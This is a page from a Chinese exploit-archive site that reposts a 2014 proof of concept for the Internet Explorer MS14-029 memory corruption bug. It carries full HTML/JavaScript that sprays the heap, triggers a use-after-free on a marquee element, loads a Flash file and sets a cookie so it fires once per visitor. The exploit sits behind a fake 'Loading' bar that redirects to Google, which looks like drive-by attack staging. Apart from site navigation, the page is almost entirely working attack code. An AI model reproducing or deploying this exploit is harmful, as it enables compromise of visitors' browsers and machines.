首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Internet Explorer MS14-029 Memory Corruption PoC 来源：vfocus.net 作者：PhysicalDrive0 发布时间：2014-08-29   <html> <head> <meta http-equiv="Cache-Control" content="no-cache"/> <sc​ript > func​tion stc() { var Then = new Date(); Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 7 ); document.cookie = "Cookie1=d93kaj3Nja3; expires="+ Then.toGMTString(); } func​tion cid() { var swf = 0; try { swf = new ActiveXObject('ShockwaveFlash.ShockwaveFlash'); } catch (e) { } if (!swf) return 0; var cookieString = new String(document.cookie); if(cookieString.indexOf("d93kaj3Nja3") == -1) {stc(); return 1;}else{ return 0;} } String.prototype.repeat=func​tion (i){return new Array(isNaN(i)?1:++i).join(this);} var tpx=un​escape ("%u1414%u1414").repeat(0x60/4-1); var ll=new Array(); for (i=0;i<3333;i++)ll.push(document.create​Element("img")); for(i=0;i<3333;i++) ll[i].className=tpx; for(i=0;i<3333;i++) ll[i].className=""; CollectGarbage(); func​tion b2() { try{xdd.re​placeNode(document.createTextNode(" "));}catch(exception){} try{xdd.outerText='';}catch(exception){} CollectGarbage(); for(i=0;i<3333;i++) ll[i].className=tpx; } func​tion a1(){ if (!cid()) return; document.body.contentEditable="true"; try{xdd.applyElement(document.create​Element("frameset"));}catch(exception){} try{document.selection.createRange().select();}catch(exception){} } </ sc​ript > </head> <body onload='setTimeout("a1();",2000);' onresize=b2()> <marquee id=xdd > </marquee> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1%" height="1%" id="FE"> <param name="movie" value="storm.swf" /> <param name="quality" value="high" /> <param name="bgcolor" value="#ffffff" /> <param name="allowScriptAccess" value="sameDomain" /> <param name="allowFullScreen" value="true" /> </object> </body> <body> <form name=loading> ¡¡<p align=center> <font color="#0066ff" size="2"> Loading....,Please Wait</font> <font color="#0066ff" size="2" face="verdana"> ...</font> ¡¡¡¡<input type=text name=chart size=46 style="font-family:verdana; font-weight:bolder; color:#0066ff; background-color:#fef4d9; padding:0px; border-style:none;"> ¡¡¡¡ ¡¡¡¡<input type=text name=percent size=47 style="color:#0066ff; text-align:center; border-width:medium; border-style:none;"> ¡¡¡¡<sc​ript > ¡¡ var bar=0¡¡ var line="||"¡¡ var amount="||"¡¡ count()¡¡ func​tion count(){¡¡ bar=bar+2¡¡ amount =amount + line¡¡ document.loading.chart.value=amount¡¡ document.loading.percent.value=bar+"%"¡¡ if (bar<99)¡¡ {setTimeout("count()",500);}¡¡ else¡¡ {window.location = "http://www.google.com.hk";}¡¡ }</ sc​ript > ¡¡</p> </form> <p align="center"> Wart,<a style="text-decoration: none" href="http://www.google.com.hk"> <font color="#FF0000"> kick me</font> </a> .</p> </body> </html>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Firefox WebIDL Privileged Java ·Plogger 1.0-RC1 - Authenticate ·glibc Off-by-One NUL Byte gcon ·ActualAnalyzer Lite 2.81 - Una ·Grand MA 300 Fingerprint Reade ·PhpWiki - Remote Command Execu ·SMF Flood Filter Issue ·XRMS - Blind SQL Injection and ·ManageEngine Password Manager ·NRPE 2.15 Remote Command Execu ·Air Transfer Iphone 1.3.9 - Mu ·HTML Help Workshop 1.4 - (SEH)   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved